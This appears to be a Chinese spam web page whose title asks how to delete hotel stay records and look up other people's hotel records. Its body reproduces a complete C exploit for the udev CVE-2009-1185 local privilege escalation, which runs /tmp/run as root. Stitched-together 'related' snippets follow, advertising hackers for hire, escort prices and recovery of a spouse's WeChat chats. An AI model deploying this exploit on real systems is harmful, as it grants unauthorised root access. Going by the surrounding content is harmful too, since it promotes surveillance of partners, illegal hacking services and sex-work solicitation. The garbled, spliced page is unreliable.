怎么删除酒店开房记录 如何查询他人在酒店和宾
* cve-2009-1185.c** udev < 141 Local Privilege Escalation Exploit* Jon Oberheide * http://jon.oberheide.org** Information:** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185** udev before 1.4.1 does not verify whether a NETLINK message originates* from kernel space, which allows local users to gain privileges by sending* a NETLINK message from user space. ** Notes:** An alternate version of kcope's exploit. This exploit leverages the* 95-udev-late.rules functionality that is meant to run arbitrary commands* when a device is removed. A bit cleaner and reliable as long as your* distro ships that rule file. The exploit will execute /tmp/run as root* so throw whatever payload you want in there.** Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,* usually is the udevd PID minus 1) as argv[1].*/#include #include #include #include #include #include #include #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif int main(int argc, char **argv) { int sock; char *mp; char message[4096]; struct msghdr msg; struct iovec iovector; struct sockaddr_nl address; memset(&address, 0, sizeof(address)); address.nl_family = AF_NETLINK; address.nl_pid = atoi(argv[1]); address.nl_groups = 0; msg.msg_name = (void*)&address; msg.msg_namelen = sizeof(address); msg.msg_iov = &iovector; msg.msg_iovlen = 1; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &address, sizeof(address)); mp = message; mp += sprintf(mp, "a@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1; iovector.iov_base = (void*)message; iovector.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } // milw0rm.com [2009-04-30]
相关文章
找上海外籍极品商务陪伴儿价钱表【褚芳】
找上海外籍极品商务陪伴小学妹价钱表【褚芳】 今天给大家分享的内容是“找上海外籍极品商务陪伴小学妹价钱表【褚芳】”,我是褚芳,来自荆州市,今年24岁,作为职业:行政,我热爱我的职业:行政。三圍:胸61腰...
我想恢复老婆的微信聊天记录
随着微信的普及,我们在使用微信的过程中必然会产生大量的聊天记录,不小心删除微信聊天记录也是很正常的事情,聊天记录被误删不要紧,关键是用什么方法可以找回来弥补我们的损坏呢?恢复聊天记录的方法有很多,今天...
8岁小天才入侵黑客(小天才电话手表黑客代码)
小天才黑客代码是多少 您问的是小天才手表隐藏游戏代码是什么吗?*#553。在小天才手表中,长按绑定号键,输入*#553,系统会自动发放10万赢积分,故此代码被称为隐藏游戏代码。请问你是想问“小天才手表...
全球最大黑客组织匿名者「公司被黑客攻击要求汇比特币怎么办」
⒈匿名者黑客组织匿名者黑客组织是世界最大的黑客组织,也是世界最大的政治意识黑客组织。其关键遍布于美国,次之为欧洲国家,非州、南美洲、亚洲地区等地都是有其各分部。“匿。 ⒉世界上最大黑客组织匿名者向I...
怎么才能成为一个黑客(怎样才能成为黑客)-国内最厉害的三大黑客之一
怎么才能成为一个黑客(怎样才能成为黑客)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...
聚焦合作与发展 东南辉渠镇亚国家政要、驻华使节热议
中新社南宁11月28日电 (记者 朱晨曦)中共中央对外联络部和中共广西壮族自治区委员会近日在广西南宁共同主办中国共产党同东南亚国家政党对话会。中联部部长宋涛在会上重点宣介了十九届五中全会精神,并表...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!